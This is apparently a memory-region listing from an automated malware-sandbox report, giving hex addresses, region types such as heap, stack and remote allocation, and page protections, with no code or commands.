1AFBF000
stack
page read and write
1AFEB000
direct allocation
page execute and read and write
45A000
unkown
page read and write
7EF10000
direct allocation
page read and write
C0093FF000
stack
page read and write
17C1EEC5000
heap
page read and write
29302524000
heap
page read and write
22C67113000
heap
page read and write
1A0BF7B4000
heap
page read and write
265FDB57000
heap
page read and write
17C1ED4C000
heap
page read and write
7FF849090000
trusted library allocation
page read and write
2842740D000
heap
page read and write
24F0000
heap
page read and write
2A4C84C0000
heap
page read and write
7FF848F30000
trusted library allocation
page execute and read and write
7E650000
direct allocation
page read and write
20A3E000
stack
page read and write
13AD97E000
stack
page read and write
15A34213000
trusted library allocation
page read and write
7FF789BC0000
unkown
page readonly
2544000
direct allocation
page read and write
7D7000
heap
page read and write
7F150000
direct allocation
page read and write
7FF789C01000
unkown
page read and write
6EE000
stack
page read and write
1B45B000
heap
page read and write
15A30E60000
heap
page read and write
1BA64000
direct allocation
page execute and read and write
293021C0000
heap
page read and write
7FF789C1C000
unkown
page write copy
7F150000
direct allocation
page read and write
1FD22695000
heap
page read and write
7FF789C09000
unkown
page read and write
15A30C70000
heap
page read and write
1FD24E00000
heap
page read and write
17C1EEC0000
heap
page read and write
7FF789C1C000
unkown
page write copy
7FA30000
direct allocation
page read and write
7FF67DE31000
unkown
page execute read
2370000
heap
page read and write
7FF789BC1000
unkown
page execute read
7FF848EC6000
trusted library allocation
page read and write
7FF67DFC6000
unkown
page readonly
7F0AF000
direct allocation
page read and write
7FF789BFD000
unkown
page read and write
1A83E000
stack
page read and write
7FF789C01000
unkown
page read and write
7EA18000
direct allocation
page read and write
7FF789C19000
unkown
page readonly
1A6B8000
direct allocation
page read and write
19DB2020000
heap
page read and write
20F5E000
stack
page read and write
7FF848E13000
trusted library allocation
page execute and read and write
1D519FA8000
heap
page read and write
640000
heap
page read and write
28427077000
heap
page read and write
28427097000
heap
page read and write
7FF789BC0000
unkown
page readonly
304D3DE000
stack
page read and write
2553000
direct allocation
page read and write
7FF789BC0000
unkown
page readonly
7FF703A07000
unkown
page readonly
7FF789BF2000
unkown
page readonly
265FFB10000
heap
page read and write
15A30CB0000
heap
page read and write
215EF11B000
heap
page read and write
7FF8490B0000
trusted library allocation
page read and write
2A4C8370000
heap
page read and write
7FF789BC1000
unkown
page execute read
7FF789C19000
unkown
page readonly
285A07F000
stack
page read and write
287A000
direct allocation
page execute and read and write
729C6FE000
stack
page read and write
1BA10000
direct allocation
page execute and read and write
22C65424000
heap
page read and write
1F831CA7000
heap
page read and write
1E50A5A3000
heap
page read and write
D3B5EC000
stack
page read and write
15A4AE96000
heap
page read and write
1BA5B000
direct allocation
page execute and read and write
7FF789C0F000
unkown
page read and write
1730D2B0000
heap
page read and write
1AFE0000
direct allocation
page execute and read and write
1D462FE000
stack
page read and write
7F200000
direct allocation
page read and write
2318000
direct allocation
page read and write
7FF789C1C000
unkown
page write copy
A4E000
stack
page read and write
7FF655893000
unkown
page read and write
1C10FBF0000
heap
page read and write
7FF789BC1000
unkown
page execute read
7FF789C1D000
unkown
page readonly
1D519F8B000
heap
page read and write
7FF8490C0000
trusted library allocation
page read and write
1A73A000
direct allocation
page read and write
2440000
direct allocation
page execute and read and write
7FC000
heap
page read and write
15E7E02C000
heap
page read and write
1AA7F000
stack
page read and write
7FF67DE31000
unkown
page execute read
1B031000
direct allocation
page execute and read and write
7FF789BFD000
unkown
page read and write
215EF445000
heap
page read and write
15A4B030000
heap
page read and write
605000
heap
page read and write
7FF789C19000
unkown
page readonly
15A32900000
heap
page read and write
1D45FEC000
stack
page read and write
2B4C000
stack
page read and write
7FF848E2B000
trusted library allocation
page read and write
28427060000
heap
page read and write
7FF703A06000
unkown
page write copy
7FF789BFD000
unkown
page write copy
7FF789C1D000
unkown
page readonly
1C10F860000
heap
page read and write
7FF655881000
unkown
page execute read
7FF789BFD000
unkown
page read and write
7CA000
heap
page read and write
C3C000
stack
page read and write
7F19F000
direct allocation
page read and write
2842708A000
heap
page read and write
7FF789BC0000
unkown
page readonly
1B70F000
heap
page read and write
1FD22710000
heap
page read and write
7FF789BFD000
unkown
page write copy
7FF789C19000
unkown
page readonly
1FD2274D000
heap
page read and write
46262FC000
stack
page read and write
7FF789BC0000
unkown
page readonly
1FD2272A000
heap
page read and write
1FD240C3000
heap
page read and write
30EC78E000
stack
page read and write
D3B8FE000
stack
page read and write
29E5000
direct allocation
page execute and read and write
68E000
stack
page read and write
1D51A235000
heap
page read and write
1FD226A0000
heap
page read and write
293021F7000
heap
page read and write
7EFF0000
direct allocation
page read and write
7EB60000
direct allocation
page read and write
17C1ED4C000
heap
page read and write
71A000
heap
page read and write
28427070000
heap
page read and write
7E720000
direct allocation
page read and write
7FF7039F0000
unkown
page readonly
17C20BA0000
trusted library allocation
page read and write
6B6000
heap
page read and write
19D000
stack
page read and write
7F1F8000
direct allocation
page read and write
2842708A000
heap
page read and write
7FF789BC1000
unkown
page execute read
83B000
heap
page read and write
15E7E2B5000
heap
page read and write
7F8000
heap
page read and write
7FF789BC1000
unkown
page execute read
1D519FA8000
heap
page read and write
293021D0000
heap
page read and write
17C1ED09000
heap
page read and write
7FF789BFD000
unkown
page read and write
1FD22718000
heap
page read and write
7FF848FC1000
trusted library allocation
page read and write
1B027000
direct allocation
page execute and read and write
7FF789C19000
unkown
page readonly
2FA7000
heap
page read and write
19DB2010000
heap
page read and write
28428D03000
heap
page read and write
15E7E020000
heap
page read and write
1D51A160000
heap
page read and write
1C10F88B000
heap
page read and write
C2FA7F000
stack
page read and write
7F1F0000
direct allocation
page read and write
29302520000
heap
page read and write
215EF133000
heap
page read and write
207B8000
direct allocation
page read and write
1B6BE000
heap
page read and write
231C000
direct allocation
page read and write
1A6C6000
direct allocation
page read and write
15A42F66000
trusted library allocation
page read and write
FCB30FF000
stack
page read and write
7FF789BC0000
unkown
page readonly
1B14F000
stack
page read and write
33C38000
heap
page read and write
7EA30000
direct allocation
page read and write
1B312000
heap
page read and write
2256000
direct allocation
page read and write
7FF848E14000
trusted library allocation
page read and write
1730D0E5000
heap
page read and write
7FF789BC0000
unkown
page readonly
1A748000
direct allocation
page read and write
C008F5C000
stack
page read and write
7E7F0000
direct allocation
page read and write
1C10F850000
heap
page read and write
2A4C8630000
heap
page read and write
796000
heap
page read and write
1E50AD2A000
heap
page read and write
7FF789BF2000
unkown
page readonly
17C1ED2C000
heap
page read and write
15A32FE2000
trusted library allocation
page read and write
7FF67DE30000
unkown
page readonly
7F4000
heap
page read and write
53D37FE000
stack
page read and write
265FDB66000
heap
page read and write
30EB6FF000
stack
page read and write
729C34C000
stack
page read and write
15A42DBF000
trusted library allocation
page read and write
7FF789BF2000
unkown
page readonly
15E7E2B4000
heap
page read and write
7FF789BC1000
unkown
page execute read
1F0000
heap
page read and write
7FF849020000
trusted library allocation
page read and write
30EBB38000
stack
page read and write
1FB5C6C7000
heap
page read and write
215EF080000
heap
page read and write
1B9F1000
direct allocation
page execute and read and write
7FF789C0F000
unkown
page read and write
1AABE000
stack
page read and write
7FF789C19000
unkown
page readonly
7FF789C0F000
unkown
page read and write
7F210000
direct allocation
page read and write
7EFE0000
direct allocation
page read and write
1AD7E000
stack
page read and write
7FF8490E0000
trusted library allocation
page read and write
19DB1F60000
heap
page read and write
1B848000
heap
page read and write
7E830000
direct allocation
page read and write
22C6761A000
heap
page read and write
C2FB7C000
stack
page read and write
7FF789C1C000
unkown
page write copy
1B6F2000
heap
page read and write
781000
heap
page read and write
7FF789BF2000
unkown
page readonly
7FF67DFC6000
unkown
page readonly
265FDC50000
heap
page read and write
1A72C000
direct allocation
page read and write
1AD2F000
stack
page read and write
1730D290000
heap
page read and write
17C1ECB0000
heap
page read and write
230D000
direct allocation
page read and write
1C10FA50000
heap
page read and write
15A32DA0000
heap
page execute and read and write
28427098000
heap
page read and write
17C1ED2C000
heap
page read and write
7FF789C19000
unkown
page readonly
7FF849130000
trusted library allocation
page read and write
7FF67DFC5000
unkown
page write copy
7EB60000
direct allocation
page read and write
7FC85000
direct allocation
page read and write
2F90000
heap
page read and write
765000
heap
page read and write
A2170FF000
stack
page read and write
1F1FB384000
heap
page read and write
7FF789BFD000
unkown
page read and write
7FF789BFD000
unkown
page write copy
1FB5C570000
heap
page read and write
1B02B000
direct allocation
page execute and read and write
15A30D37000
heap
page read and write
15A30F10000
trusted library allocation
page read and write
C1CFBFF000
stack
page read and write
7EAA8000
direct allocation
page read and write
7FF789BC1000
unkown
page execute read
1B597000
heap
page read and write
EA5EEFC000
stack
page read and write
FC901FF000
stack
page read and write
7DC000
heap
page read and write
BA0000
heap
page read and write
265FDD60000
heap
page read and write
1B80C000
stack
page read and write
7FF849070000
trusted library allocation
page read and write
7FF67DF4E000
unkown
page readonly
7FF67DFC8000
unkown
page readonly
7FF789C09000
unkown
page read and write
7FF848FB0000
trusted library allocation
page read and write
1A61F000
direct allocation
page read and write
998A78F000
stack
page read and write
1E50A6F0000
heap
page read and write
338AC000
stack
page read and write
1A7FB000
stack
page read and write
7FF655881000
unkown
page execute read
7FF655880000
unkown
page readonly
1A6F1000
direct allocation
page read and write
7FF789C19000
unkown
page readonly
1ABBF000
stack
page read and write
1D519FA8000
heap
page read and write
20794000
direct allocation
page read and write
253D000
direct allocation
page read and write
1E508990000
heap
page read and write
1D51A230000
heap
page read and write
28427083000
heap
page read and write
265FDCC0000
heap
page read and write
284270B4000
heap
page read and write
7E950000
direct allocation
page read and write
265FDB6A000
heap
page read and write
1FD2271F000
heap
page read and write
74E000
heap
page read and write
17C1ECD0000
heap
page read and write
1FD2275D000
heap
page read and write
7FF789BFD000
unkown
page read and write
215EF090000
heap
page read and write
55C000
unkown
page read and write
3210000
heap
page read and write
1FB5C6C7000
heap
page read and write
255A000
direct allocation
page read and write
15A30E80000
heap
page read and write
15A32DB1000
trusted library allocation
page read and write
2842709C000
heap
page read and write
1BA57000
direct allocation
page execute and read and write
1FD2272A000
heap
page read and write
265FDB98000
heap
page read and write
1AFC1000
direct allocation
page execute and read and write
1D519FA8000
heap
page read and write
7FF848E12000
trusted library allocation
page read and write
17C1ED1B000
heap
page read and write
1A0BF390000
heap
page read and write
7FF789C01000
unkown
page read and write
7FF789C1D000
unkown
page readonly
21D0000
heap
page read and write
7F150000
direct allocation
page read and write
7FF789BC0000
unkown
page readonly
53D38FF000
stack
page read and write
7FE10000
direct allocation
page read and write
7EF30000
direct allocation
page read and write
15A30F80000
heap
page read and write
C80000
heap
page read and write
15A4ADCC000
heap
page read and write
265FDB7C000
heap
page read and write
1F831C8B000
heap
page read and write
2BF6F660000
heap
page read and write
265FDB9B000
heap
page read and write
13AD8FE000
stack
page read and write
7DF000
heap
page read and write
7FF789BF2000
unkown
page readonly
1A716000
direct allocation
page read and write
5ECCFE000
stack
page read and write
1AFE4000
direct allocation
page execute and read and write
2FB3000
heap
page read and write
15A42E2F000
trusted library allocation
page read and write
293021DB000
heap
page read and write
22C6745E000
heap
page read and write
6B0000
heap
page read and write
7FF789BC0000
unkown
page readonly
7B3000
heap
page read and write
1A708000
direct allocation
page read and write
7FF789BC0000
unkown
page readonly
1E50AAF5000
heap
page read and write
7FF789C1C000
unkown
page write copy
254C000
direct allocation
page read and write
284270B8000
heap
page read and write
1E50AD36000
heap
page read and write
1A84B000
stack
page read and write
1A741000
direct allocation
page read and write
19DB2034000
heap
page read and write
17C1ED4C000
heap
page read and write
2A4C84C4000
heap
page read and write
17C213A0000
heap
page read and write
265FDB77000
heap
page read and write
20C7F000
stack
page read and write
7FF789BC1000
unkown
page execute read
6F3000
heap
page read and write
22C67110000
heap
page read and write
7FF67DF4E000
unkown
page readonly
2568000
direct allocation
page read and write
15A42DB1000
trusted library allocation
page read and write
7FF789C1D000
unkown
page readonly
7FF67DE31000
unkown
page execute read
7FF789BC0000
unkown
page readonly
17C1ED4C000
heap
page read and write
7FF789BC1000
unkown
page execute read
265FDB7C000
heap
page read and write
998A70D000
stack
page read and write
2A4C8470000
heap
page read and write
83E000
heap
page read and write
7FF789C1D000
unkown
page readonly
19DB2014000
heap
page read and write
1A93F000
stack
page read and write
2078D000
direct allocation
page read and write
7E7000
heap
page read and write
28427260000
heap
page read and write
1FB5C6A0000
heap
page read and write
15A34910000
trusted library allocation
page read and write
24CC000
stack
page read and write
26580000000
trusted library allocation
page read and write
7FF67DE30000
unkown
page readonly
1FD2275B000
heap
page read and write
7FF789C01000
unkown
page read and write
7FF789C01000
unkown
page read and write
2F30000
heap
page read and write
293023C0000
heap
page read and write
22C6760B000
heap
page read and write
15E7DF90000
heap
page read and write
7F19F000
direct allocation
page read and write
7FF789C19000
unkown
page readonly
7FF789BFD000
unkown
page write copy
1B000000
remote allocation
page read and write
15A34634000
trusted library allocation
page read and write
2F0E000
stack
page read and write
1FD22690000
heap
page read and write
2F98000
heap
page read and write
232A000
direct allocation
page read and write
7FBDF000
direct allocation
page read and write
15A30EB0000
heap
page read and write
7F319000
direct allocation
page read and write
7E730000
direct allocation
page read and write
7FF789BF2000
unkown
page readonly
1F831E95000
heap
page read and write
30EBABA000
stack
page read and write
1B43D000
heap
page read and write
1D519FA8000
heap
page read and write
7FF789BF2000
unkown
page readonly
7FF789BF2000
unkown
page readonly
7FF703A59000
unkown
page readonly
30EB979000
stack
page read and write
19DB2028000
heap
page read and write
7FF789C19000
unkown
page readonly
7F240000
direct allocation
page read and write
1A0BF5F0000
heap
page read and write
1F831EA0000
heap
page read and write
15A30CAE000
heap
page read and write
7FF789C19000
unkown
page readonly
7FF789BC0000
unkown
page readonly
7D9000
heap
page read and write
17C1ED1B000
heap
page read and write
1F831C80000
heap
page read and write
52B000
unkown
page write copy
630000
heap
page read and write
1E508A34000
heap
page read and write
284270BC000
heap
page read and write
19D000
stack
page read and write
7F0000
heap
page read and write
15A4ADC7000
heap
page read and write
7FF789BF2000
unkown
page readonly
33C30000
heap
page read and write
15A4B040000
heap
page read and write
1FB5C6C6000
heap
page read and write
7FF789C19000
unkown
page readonly
1A63E000
direct allocation
page read and write
17C1ED48000
heap
page read and write
15E7DFA0000
heap
page read and write
265FDB6A000
heap
page read and write
1B327000
heap
page read and write
1D519FA5000
heap
page read and write
7FF67DFAA000
unkown
page write copy
1F831B70000
heap
page read and write
1F831D80000
heap
page read and write
7FF848ECC000
trusted library allocation
page execute and read and write
1C6B9190000
heap
page read and write
7EAC0000
direct allocation
page read and write
7F290000
direct allocation
page read and write
30CF000
stack
page read and write
7FF789C1C000
unkown
page write copy
7FF789BFD000
unkown
page write copy
7FF789C1D000
unkown
page readonly
2859E7B000
stack
page read and write
7F30A000
direct allocation
page read and write
22F0000
direct allocation
page read and write
7FF789BC1000
unkown
page execute read
7FF7039FA000
unkown
page readonly
7748BFF000
stack
page read and write
7FF789C14000
unkown
page read and write
55E000
unkown
page write copy
17C1EE30000
heap
page read and write
1C600AB5000
heap
page read and write
7FE1F000
direct allocation
page read and write
BEB1C7E000
stack
page read and write
7FF789BFD000
unkown
page read and write
7FF789BFD000
unkown
page read and write
7FF789BFD000
unkown
page write copy
1C600850000
heap
page read and write
EA5EFFF000
stack
page read and write
7FF789BC0000
unkown
page readonly
265FDD65000
heap
page read and write
9B000
stack
page read and write
1E508A30000
heap
page read and write
3200000
heap
page read and write
33AEF000
stack
page read and write
1FD2269C000
heap
page read and write
7FF789C1D000
unkown
page readonly
837000
heap
page read and write
7FD50000
direct allocation
page read and write
FC900FC000
stack
page read and write
46264FF000
stack
page read and write
7EB2F000
direct allocation
page read and write
7FF67DFC8000
unkown
page readonly
1D519FA8000
heap
page read and write
1BA59000
direct allocation
page execute and read and write
2859FFC000
stack
page read and write
1C6B91B3000
heap
page read and write
284270B4000
heap
page read and write
17C1ED48000
heap
page read and write
15A30CDA000
heap
page read and write
15A4AE7A000
heap
page read and write
284270B8000
heap
page read and write
A216DDB000
stack
page read and write
2859DF6000
stack
page read and write
30EB34E000
stack
page read and write
7FF67DFB4000
unkown
page write copy
55A000
unkown
page read and write
1C6B919D000
heap
page read and write
7FA30000
direct allocation
page read and write
1A733000
direct allocation
page read and write
7FF789BFD000
unkown
page read and write
1A0BF3A0000
heap
page read and write
7FF789C1D000
unkown
page readonly
1FD22736000
heap
page read and write
1B69F000
heap
page read and write
1FD2272A000
heap
page read and write
7F480000
direct allocation
page read and write
7FF789BC1000
unkown
page execute read
15A327C2000
heap
page read and write
17C1EBD0000
heap
page read and write
7F060000
direct allocation
page read and write
7FF8490F0000
trusted library allocation
page read and write
17C1ED4C000
heap
page read and write
7FF848E20000
trusted library allocation
page read and write
798000
heap
page read and write
1AD7E000
stack
page read and write
7FF789C19000
unkown
page readonly
15E7E2B0000
heap
page read and write
15A4AE3B000
heap
page read and write
1B6BA000
heap
page read and write
7FF8490A0000
trusted library allocation
page read and write
19DB3AC0000
heap
page read and write
1A0BF7B0000
heap
page read and write
22E2000
direct allocation
page read and write
7FF67DFB8000
unkown
page read and write
7FF849150000
trusted library allocation
page read and write
20E1E000
stack
page read and write
2FA7000
heap
page read and write
7FF67DF4E000
unkown
page readonly
FCB2D0C000
stack
page read and write
7FF848FD0000
trusted library allocation
page execute and read and write
7F0E0000
direct allocation
page read and write
17C1ED3F000
heap
page read and write
1C6008E8000
heap
page read and write
7F200000
direct allocation
page read and write
CD0037E000
stack
page read and write
7FF789C14000
unkown
page read and write
7FF67DFAA000
unkown
page write copy
1FD22726000
heap
page read and write
2338000
direct allocation
page read and write
1FD22726000
heap
page read and write
1FD24080000
heap
page read and write
7FF789BF2000
unkown
page readonly
7FC35000
direct allocation
page read and write
7EB40000
direct allocation
page read and write
1B000000
remote allocation
page read and write
2331000
direct allocation
page read and write
7F240000
direct allocation
page read and write
1B029000
direct allocation
page execute and read and write
7FF789C0F000
unkown
page read and write
837000
heap
page read and write
2340000
direct allocation
page execute and read and write
1E50A5A0000
heap
page read and write
7FF789BF2000
unkown
page readonly
7FF67DFAA000
unkown
page write copy
15A339E2000
trusted library allocation
page read and write
7FF7039FD000
unkown
page readonly
7FF848ED0000
trusted library allocation
page execute and read and write
7EB50000
direct allocation
page read and write
19DB1F50000
heap
page read and write
2303000
direct allocation
page read and write
1C10F8A8000
heap
page read and write
7E8C0000
direct allocation
page read and write
1FD22650000
heap
page read and write
A0F000
stack
page read and write
15A4ADB0000
heap
page read and write
7B3000
heap
page read and write
7EFD0000
direct allocation
page read and write
2BF6F4B5000
heap
page read and write
740000
heap
page read and write
215EF0B0000
heap
page read and write
7FF789BC0000
unkown
page readonly
3386F000
stack
page read and write
7DF4E8B70000
trusted library allocation
page execute and read and write
1D519FA8000
heap
page read and write
22C65340000
heap
page read and write
4B40000
heap
page read and write
19DB1F80000
heap
page read and write
2BF6F760000
heap
page read and write
17C1ED4E000
heap
page read and write
15A3477C000
trusted library allocation
page read and write
7FF789BF2000
unkown
page readonly
22C67080000
heap
page read and write
15A30F85000
heap
page read and write
2FAF000
heap
page read and write
7FF849100000
trusted library allocation
page read and write
293023A0000
heap
page read and write
2859F7E000
stack
page read and write
1F1FB040000
heap
page read and write
7FF789C1C000
unkown
page write copy
30EBD3F000
stack
page read and write
1F831CA4000
heap
page read and write
7FF789BF2000
unkown
page readonly
265FDB20000
heap
page read and write
22C65430000
heap
page read and write
1F0000
heap
page read and write
1A6D4000
direct allocation
page read and write
28427086000
heap
page read and write
7FF789C0F000
unkown
page read and write
7EB70000
direct allocation
page read and write
265FDD6C000
heap
page read and write
2859EFF000
stack
page read and write
208FE000
stack
page read and write
7FF789C0F000
unkown
page read and write
1730D0CC000
heap
page read and write
7FF789C19000
unkown
page readonly
15A32760000
trusted library allocation
page read and write
1B7F9000
heap
page read and write
1F1FB380000
heap
page read and write
1C6B91B8000
heap
page read and write
7FF67DFBD000
unkown
page readonly
7FF789C14000
unkown
page read and write
30EB8FD000
stack
page read and write
2842708A000
heap
page read and write
2BF6F765000
heap
page read and write
1A0BF448000
heap
page read and write
7FF789C19000
unkown
page readonly
7FF789C1C000
unkown
page write copy
15A30D80000
heap
page read and write
1F831C50000
heap
page read and write
22FC000
direct allocation
page read and write
20B3F000
stack
page read and write
7F0E0000
direct allocation
page read and write
1B04E000
stack
page read and write
781000
heap
page read and write
7FF789BFD000
unkown
page read and write
1AE7E000
stack
page read and write
7FF789C0F000
unkown
page read and write
1F0000
heap
page read and write
7FF67DFBD000
unkown
page readonly
210D4000
direct allocation
page execute and read and write
7FF789BFD000
unkown
page write copy
15A32E39000
trusted library allocation
page read and write
5FE000
stack
page read and write
1A700000
direct allocation
page read and write
3247000
heap
page read and write
28429050000
trusted library allocation
page read and write
215EF110000
heap
page read and write
7E9E0000
direct allocation
page read and write
29302525000
heap
page read and write
A21707E000
stack
page read and write
1BA1F000
direct allocation
page execute and read and write
79D000
heap
page read and write
15A4AE94000
heap
page read and write
6F0000
heap
page read and write
7FF789C1C000
unkown
page write copy
2FBE000
heap
page read and write
53D36FC000
stack
page read and write
304D6FF000
stack
page read and write
B70000
heap
page read and write
825000
heap
page read and write
7FF789BFD000
unkown
page write copy
78D000
heap
page read and write
5AE000
stack
page read and write
796000
heap
page read and write
207A3000
direct allocation
page read and write
208BB000
stack
page read and write
766000
heap
page read and write
1FB5C6C4000
heap
page read and write
22F4000
direct allocation
page read and write
1B43A000
heap
page read and write
7FF789BFD000
unkown
page write copy
1BA61000
direct allocation
page execute and read and write
15A42E23000
trusted library allocation
page read and write
7FF789BF2000
unkown
page readonly
7FC2F000
direct allocation
page read and write
210D8000
direct allocation
page execute and read and write
30EB7FE000
stack
page read and write
7F1A8000
direct allocation
page read and write
30EB67F000
stack
page read and write
7EB10000
direct allocation
page read and write
7FF789C14000
unkown
page read and write
15A4AE65000
heap
page read and write
7FF7039F1000
unkown
page execute read
7EF70000
direct allocation
page read and write
C1CF7DC000
stack
page read and write
1D519F80000
heap
page read and write
15A4AE9F000
heap
page read and write
1FD22723000
heap
page read and write
2A4C8558000
heap
page read and write
7FF67DFBD000
unkown
page readonly
2430000
heap
page read and write
51C000
unkown
page write copy
7EE000
heap
page read and write
There are 1142 hidden memdumps, click here to show them.